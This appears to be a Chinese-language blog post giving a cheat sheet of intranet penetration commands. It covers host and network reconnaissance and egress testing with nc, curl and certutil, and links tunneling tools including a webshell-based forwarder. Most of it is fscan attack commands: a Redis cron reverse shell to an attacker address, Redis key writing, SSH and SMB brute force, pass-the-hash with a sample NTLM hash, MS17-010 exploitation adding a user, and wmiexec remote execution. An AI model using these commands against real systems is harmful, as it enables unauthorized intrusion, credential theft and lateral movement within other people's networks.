內網滲透工具

Ho1d_F0rward發表於2024-06-10

獲取網路配置

ipconfig /all
ifconfig
同時透過這個也可以知道是windows還是linux

獲取系統資訊

systeminfo | findstr /B /C"OS名稱 " OS 版本"
systeminfo | findstr /B /C"OSName " OS Version"
其實直接使用systeminfo感覺更靠譜,有些版本格式不一樣,查不出來。不如直接使用systeminfo。

使用工具
http://www.fuzzysecurity.com/scripts/files/wmic_info.rar

識別殺軟網站
https://i.hacking8.com/tiquan/

檢視是否出網

ICMP協議

ping www.baidu.com  
tracert baidu.com

TCP/UDP

telnet 192.168.1.108 22        //TCP
nc -zv 39.101.135.232 9999        //TCP
nc -zuv 192.168.1.108 80       //UDP

HTTP/HTTPS


curl http://www.baidu.com      //HTTP
curl https://www.baidu.com     //HTTPS
Linux:wget、curl
Windows:certutil、powershell、bitsadmin、regsrv......

DNS

dig @8.8.8.8 www.baidu.com        //DNS
nslookup www.baidu.com 8.8.8.8    //DNS

獲取許可權資訊

whoami

隧道搭建

當frp搭建不了的時候,使用webshell來進行一個搭流量轉發
https://github.com/zema1/suo5

https://github.com/fatedier/frp/releases/tag/v0.58.1

https://github.com/ehang-io/nps/blob/master/README_zh.md

內網掃描

查詢arp快取表

arp -n
arp -a

使用掃描工具

https://github.com/shmilylty/netspy

nohup netspy is &
nohup netspy is -c 10.0.0.1/8 &

https://github.com/shadow1ng/fscan

fscan.exe -h 192.168.1.1/24  -nobr -nopoc  
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳過存活檢測 、不儲存檔案、跳過web poc掃描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫公鑰)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計劃任務反彈shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功後,命令執行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模組ssh和埠)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (載入指定檔案的使用者名稱、密碼來進行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定掃描結果儲存路徑,預設儲存在當前路徑) 
fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速檢視網段資訊 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密碼碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模組)
fscan.exe -hf ip.txt  (以檔案匯入)
fscan.exe -u http://baidu.com -proxy 8080 (掃描單個url,並設定http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不進行爆破,不掃Web poc,以減少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基礎上,加入3389->rdp掃描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支援簡單tcp功能的代理,部分功能的庫不支援設定代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (內建新增使用者等功能,只適用於備選工具,更推薦其他ms17010的專項利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec無回顯命令執行)
-socks5

域資訊獲取

參考[[Cobalt Strike使用]]

相關文章